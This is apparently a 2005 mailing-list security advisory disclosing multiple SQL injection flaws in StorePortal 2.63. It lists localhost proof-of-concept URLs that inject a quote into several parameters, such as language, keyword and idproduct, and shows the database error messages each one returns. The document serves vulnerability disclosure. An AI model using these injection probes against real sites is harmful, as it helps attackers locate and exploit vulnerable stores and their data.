<<< Date Index >>>     <<< Thread Index >>>

Multiple SQL Injections in StorePortal 2.63




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn 
more at http://www.digitalparadox.org/services.ah

Severity: High
Title: Multiple SQL Injections in StorePortal 2.63
Date: 24/04/2005

Vendor: StorePortal
Vendor Website: http://www.storeportal.com/
Summary: There are, multiple sql injections in storeportal 2.63.


Proof of Concept Exploits: 

These sql injections are caused by the referrer, of these pages called, and are 
only exploitable if u visit them after visiting 
default.asp

http://localhost/default.asp?language='sqlinjection
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error 
(missing operator) in query expression 

''/default.asp?language='sqlinjection&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?id=1&opr=2&amp%3bpic='sql_injection_
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error 
(missing operator) in query expression 

''/default.asp?id=1&opr=2&pic='sql_injection_&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error 
(missing operator) in query expression 

''/default.asp?opr=35&id=1&idcategory='sql_injection_&idcategoryp=1&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_
SQL INJECTION

 Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error 
(missing operator) in query expression 

''/default.asp?opr=35&id=1&idcategory=1&idcategoryp='sql_injection_&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?mnu=&id=1&opr=5&content='sql_injection_
SQL INJECTION

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error 
(missing operator) in query expression 

''/default.asp?mnu=&id=1&content='sql_injection_&opr=5&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?id=1&opr=4&keyword='sql_injection_
SQL INJECTION

   Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error 
(missing operator) in query expression 'IdCategoriaInfo = 1 and 
Visible = 

'true' and '20050424' >= DataPubblicazione and (DataExpire <= ' 20050424' or 
DataExpire is null or DataExpire = '') and (Name like 

'%'sql_injection_%' or Body like '%'sql_injection_%')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers


http://localhost/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_
SQL INJECTION

ERROR MESSAGE !

Store Portal Errors Occured!

    Error Number= #-2147217900
    Error Desc.= [Microsoft][ODBC Microsoft Access Driver] Syntax error 
(missing operator) in query expression 

''/default.asp?opr=41&idcategory=11&idcategoryp=11&id=1&idproduct='sql_injection_&','')'.
    Help Context= 0
    Error Source= Microsoft OLE DB Provider for ODBC Drivers



Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: 
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel 
free to 

contact me regarding these vulnerabilities. You can find me at, 
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for 
my soon to come 

out book on Secure coding with php.